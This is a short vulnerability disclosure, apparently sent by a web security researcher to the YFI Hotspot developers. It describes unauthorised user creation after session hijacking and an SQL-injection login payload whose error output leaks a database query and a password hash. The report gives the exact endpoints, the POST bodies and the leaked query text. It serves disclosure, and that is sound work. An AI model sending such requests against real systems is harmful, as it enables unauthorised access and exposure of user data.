#9 Information Leakage In YFI Hotspot

[Mohamed Khaled Fathy]

Hello YFI Team ,

My Name Is Mohamed Khaled Fathy [ Web Application Security Researcher ] From Egypt

I've Found Vulnerability On YFI Hotspot , Maybe This Bug Is Critical Bug .

URL : http://10.1.0.1/c2/yfi_cake/permanent_users/json_add/AP/?

POST Data :

username=123pp&password=matrix&name=&surname=&address=&phone=&email=&active=on&language=4a80e849-5300-46b5-9b64-4ba1a509ff00&realm=4ee90242-50bc-4905-bb49-03c80a010001&profile=54117885-4604-40c6-aeb7-05d90a010001&cap=hard

When I Make Session Hjacking I Can Create New User In This Network

Also I found an error in the database , It is leaking the contents of a database system

Go To [ http://10.1.0.1/c2/yfi_cake/permanent_users/json_add/AP/? ]

URL : http://10.1.0.1/c2/yfi_cake/users/login

POST Data :

_method=POST&data%5BUser%5D%5Busername%5D=%27or%27%3D1%27&data%5BUser%5D%5Bpassword%5D=%27or%27%3D1%27

You Can See

2 SELECT User.id, User.username, User.password, User.name, User.surname, User.address, User.phone, User.email, User.active, User.cap, User.data, User.time, User.group_id, User.radcheck_id, User.profile_id, User.user_id, User.realm_id, User.language_id, User.created, User.modified, Group.id, Group.name, Group.created, Group.modified, Profile.id, Profile.name, Profile.template_id, Profile.created, Profile.modified, Creator.id, Creator.username, Creator.password, Creator.name, Creator.surname, Creator.address, Creator.phone, Creator.email, Creator.active, Creator.cap, Creator.data, Creator.time, Creator.group_id, Creator.radcheck_id, Creator.profile_id, Creator.user_id, Creator.realm_id, Creator.language_id, Creator.created, Creator.modified, Radcheck.id, Radcheck.username, Radcheck.attribute, Radcheck.op, Radcheck.value, Realm.id, Realm.name, Realm.append_string_to_user, Realm.icon_file_name, Realm.phone, Realm.fax, Realm.cell, Realm.email, Realm.url, Realm.address, Realm.created, Realm.modified, Language.id, Language.name, Language.iso_name, Language.created, Language.modified FROM users AS User LEFT JOIN groups AS Group ON (User.group_id = Group.id) LEFT JOIN profiles AS Profile ON (User.profile_id = Profile.id) LEFT JOIN users AS Creator ON (User.user_id = Creator.id) LEFT JOIN radcheck AS Radcheck ON (User.radcheck_id = Radcheck.id AND Attribute = 'Cleartext-Password') LEFT JOIN realms AS Realm ON (User.realm_id = Realm.id) LEFT JOIN languages AS Language ON (User.language_id = Language.id) WHERE User.username = '\'or\'=1\'' AND User.password = '6b413612c9b4cd979581aead27d728e406f3feba' LIMIT 1

Information Leakage From Database .